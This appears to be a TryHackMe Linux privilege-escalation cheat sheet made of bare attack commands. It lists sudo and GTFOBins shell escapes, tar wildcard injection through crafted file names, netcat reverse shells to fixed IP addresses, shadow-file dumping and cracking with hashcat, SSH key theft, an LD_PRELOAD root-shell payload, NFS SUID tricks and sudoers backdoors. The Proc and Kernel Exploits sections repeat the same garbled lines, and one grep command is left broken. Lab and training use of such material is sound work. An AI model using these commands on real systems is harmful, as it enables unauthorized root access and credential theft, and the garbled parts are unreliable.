TryHackMe

Look For Interesting files

• Look in /dev

• look in /tmp

• look in /var

• look in /etc

• look in /

• look in .bashrc

• look in .bash_history

grep -i pass

Sudo Permission

sudo -l

If no password is needed
sudo -u {username} {program}
sudo su


sudo apache2 -f /etc/shadow
sudo find /bin -name nano -exec /bin/sh \;
sudo awk 'BEGIN {system("/bin/sh")}'
echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse
sudo vim -c '!sh'

GTFObins


Note: If password is needed look for stored password

SUID/GUID/Capabilities

find / -user root -perm /4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -type f -name '*.txt' 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {}; > /tmp/suid

getcap -r / 2>/dev/null

find / -type f -perm -04000 -ls 2>/dev/null
strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file
dpkg -l | grep nginx
find / -type f -perm -04000 -ls 2>/dev/null

CRONTAB

cd /var/www/html
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.8.3.38 4443 >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"

cat /etc/crontab
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=sh\ runme.sh


#wild card
echo "mkfifo /tmp/lhennp; nc 10.17.10.67 8888 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1

Proc (Processes)

schd_debug
proc/self/cmdlline
proc/self/fg

Kernel Exploits:

schd_debug
proc/self/cmdlline
proc/self/fg

Stored Passwords (Config Files):

cat /home/user/myvpn.ovpn
cat /home/user/.irssi/config | grep -i passw

Stored Passwords (History)

cat ~/.bash_history | grep -i passw

Weak File Permissions

//To detect 
ls -la /etc/shadow

//To Exploit 
cat /etc/passwd
cat /etc/shadow

//To Crack
unshadow <PASSWORD-FILE> <SHADOW-FILE> > unshadowed.txt
hashcat -m 1800 unshadowed.txt rockyou.txt -Os

SSH Keys

//To Find
find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null

//To Exploit
chmod 400 id_rsa
ssh -i id_rsa root@<ip>

Sudo (LD_PRELOAD)

Open a text editor and type:

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}


gcc -fPIC -shared -o /tmp/x.so x.c -nostartfiles
sudo LD_PRELOAD=/tmp/x.so apache2

NFS no_root_squas

cat /etc/exports

1. Open command prompt and type: showmount -e 10.10.65.181
2. In command prompt type: mkdir /tmp/1
3. In command prompt type: mount -o rw,vers=2 10.10.65.181:/tmp /tmp/1
In command prompt type:
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/1/x.c
4. In command prompt type: gcc /tmp/1/x.c -o /tmp/1/x
5. In command prompt type: chmod +s /tmp/1/x

Writable sudoers

echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update